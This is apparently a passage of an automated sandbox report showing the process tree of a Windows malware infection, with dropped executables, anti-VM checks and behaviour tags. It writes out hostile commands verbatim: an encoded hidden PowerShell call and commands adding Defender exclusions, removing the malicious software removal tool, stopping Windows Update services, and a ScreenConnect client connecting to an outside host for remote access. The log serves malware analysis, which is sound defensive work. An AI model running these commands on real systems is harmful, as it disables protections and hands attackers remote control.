                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10216420101\9JFiKVm.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10216420101\9JFiKVm.exe"
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:8000
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\u4n0505aC8.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\u4n0505aC8.exe"
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:13276
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10216430101\zY9sqWs.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10216430101\zY9sqWs.exe"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:13056
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10216450101\ph10F2z.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10216450101\ph10F2z.exe"
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:11692
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                        powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                        PID:13476
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10216510101\d845d3d313.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10216510101\d845d3d313.exe"
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:10360
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                    PID:4896
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:3056
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                    PID:2304
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                                                                                                                                                                                                    sihost.exe
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                    PID:3004
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                      explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                      PID:1440
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5264 -ip 5264
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:3788
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                      explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:4856
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3352 -ip 3352
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2120
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:780
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                          PID:4280
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5296
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                            PID:5796
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                            PID:4872
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                            PID:1736
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4140
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:6736
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3128
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5244
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5236
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5268
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6456
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7724
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\WindowsServices\WindowsAutHost
                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\WindowsServices\WindowsAutHost
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7696
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7700
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8172
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7268
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4636
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4336
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7184
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7204
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7740
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7816
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7288
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7188
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:12308
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\WindowsServices\WindowsAutHost
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\WindowsServices\WindowsAutHost"
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12168
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            dialer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7308
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4132
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7988
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding CAC571499942F3F1785A212457831F89 C
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2880
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI7073.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240742578 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7160
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 6C3CD1A6B6068A8C5F0D41FC489B054F
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5224
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 922AA799978F9A9119B3C9D60467DBE6 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6696
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 126DCDEDFDDF8202D6136730B5CB68E3 C
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4708
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI82B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240747343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8104
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 5526E2CD16CCE5A4E7AD86870509A038
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3920
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=nbsec.innocreed.com&p=8041&s=c33b0bda-8401-4d4e-b108-e946ec8aacdb&k=BgIAAACkAABSU0ExAAgAAAEAAQDFs1kVL8bfzmRhsQrEZQSB6Mg0jllFwmZqou4Pvi9wI8qFz%2fh2%2fem9cR6FHeYUxD9jG%2fsxDFs66EJxkLi7YB87tagpfI5CyssAnhTNF2TMArTHifYU0Kj8erGcVfXQJgrNGjAs38F4MaHlprzNxrsSLTfRri2oJMUFxD9xtnkiN3j%2f8hOLwN2416R%2fVWOiOID9z90iFYDukpx5F4fLhwLOuaUsarUGqQeCoslVBaBeWmUxGtVhEiP7XGywuI0tG4lp%2bE%2b4i7tUttz1YALsqJq8L9UYEw5WyYn2z4yhGuyeHsg0jR83ntRaoqiV5SqdT5RzICIJdPttGDWJ0t7wMdqy&t=test1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3984
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.WindowsClient.exe" "RunRole" "aa6edf86-8485-416f-9586-f8ee30c11b01" "User"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\ScreenConnect Client (f01947c788fc5afe)\ScreenConnect.WindowsClient.exe" "RunRole" "6f62c8ac-9707-42ae-bf3c-a02cd133fc68" "System"
